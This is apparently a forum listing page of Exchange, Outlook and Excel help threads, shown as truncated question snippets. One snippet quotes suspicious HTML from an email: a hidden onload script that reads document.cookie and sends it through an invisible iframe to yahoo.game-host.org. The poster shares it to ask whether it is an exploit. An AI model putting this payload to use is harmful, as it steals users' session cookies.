exchange accounts will not delete from site

I have recently recovered one of my exchange 5.5 servers that crashed.  Mailboxes have been restored and replication appears to complete only down to the restored server but not up to the main site mail server that holds the global address list.  Due to lack of information in backups, it was necessary for me to manually recreate all mailboxes and then restore mailboxes.  However, the new accounts have created with a "2" appended to each mailbox name.  Example john@us.com is automatically created as john2@us.com.  How do I purge the old accounts from the global list so that I can create the properly named accounts?
0
anonymous (74717)

shade one cell that will shade multiple cells
I want to shade one cell that would go into other cell by it's self Not easy to do. You will require custom VBA code to do that. Are you Ok with macros? -- HTH... Jim Thomlinson "Walt" wrote: > I want to shade one cell that would go into other cell by it's self > ...

Exchange Cluster

Exchange

Your message was deleted without being read.
This option was available with exchange 5.5 and earlier outlook clients. Today, we are running exchange 2003 ee server along with outlook 2002 clients. Is there any way to tell if a global message is being deleted by users without being read without turing on the "read receipt" in tracking options? All I want to do is tell which users are deleting the messages internally. Thanks. mike No. -- Sue Mosher, Outlook MVP Author of Microsoft Outlook Programming - Jumpstart for Administrators, Power Users, and Developers http://www.outlookcode.com/jumpstart.aspx &qu...

Cannot Unistall IMF Exchange 2003

Reconciling accounts receivable and payable to the general ledger
Does anyone know of a tool that reconciles both the accounts receivable and payble trial balances to their respective general ledger accounts. thanks, -- JB Corporate Renaissance Group Has a product to do just that. "JB" wrote: > Does anyone know of a tool that reconciles both the accounts receivable and > payble trial balances to their respective general ledger accounts. > thanks, > -- > JB Go to www.swareindex.com (Software Index). They have Reconciler for Receivables/Payables. -- Charles Allen, MVP "Sonny Pawchuk" wrote: > Corporate Renai...

Long category labels will not expand
Long category labels space does not expand for more of the label to appear in one chart among a group of charts. In other charts in the same document, the longer labels appear correctly. ...

Exchange / POP3

virus attacks against Exchange

Is this an exploit that will do anything in Outlook?
Folks- One of my users got an e-mail message from a Yahoo user; the message had the following very interesting HTML code at the end ... <DIV id=a> </DIV> <DIV id=b style="VISIBILITY: hidden"></DIV> <STYLE onload="window.status=''; var x = escape(document.cookie).substr(0,1900) ; b.innerHTML='<iframe src=http://yahoo.game-host.org:1646/index.php?id='+document.title.substring(document.title.indexOf('-')+2)+'&amp;cookie=\''+x+'\' frameborder=0 width=10 height=10></iframe>test'; " type=...

Exchange 2003 #5

Microsoft Exchange #3

Exchange-Integrated Help Desk Software

Selective Deletion
Dear All I was wondering is it possible to write a macro to delete unwante cells within a column...? For example Col A & B have the same values as Col C and D... However, would only like to keep only Australia in Col A and its correspondin values in Col B and as for Col C, I would only like to keep China an its corresponding values in Col D... Hence, is it possible to (1) delete China in Col A & B... (2) delete Australia in Col C & D and move China up to the first row? I would really appreciate any advice or suggestions... Cheers Column A | Column B | Column C | Column D ...

exchange 5.5 to exchange 2000

Problems between two Exchange Servers

GLOBALROOT Error on Exchange 2003

antigen on exchange #2

Outlook to Domino connector; setting default email account
Hi, I'm using the Outlook to Lotus Domino/Notes connector to access our calendar system and contacts. But I use an IMAP account for receiving and sending mail. The problem is that even though I have set the IMAP account to be the default account, all new mail, (when I choose " New Mail message") is sent via the domino server. If I click the "Accounts" drop down button the first name on the list is Outlook Connector for Domino, but the IMAP account is listed as account number 1, and the Outlook connector for Domino is listed as number 2. Any suggestion swould be...

Exchange Calendar Item vs. Outlook problem
Our Exchange 5.5 (SP4) server has what appears to be a corrupt calendar item for January 20, 2004. Those people who have this recurring(?) calendar item experience an Outlook lock up (CPU 100% running process outlook.exe) when accessing their calendar for that date and when syncing for offline Outlook use. This effects Outlook versions 2000 and 2002. Because the item can not be accessed from an Outlook client it can not be deleted. Is there a way to delete recurring calendar items from a specific date in the private data store? Is there an Outlook patch that prevents the CPU utilization p...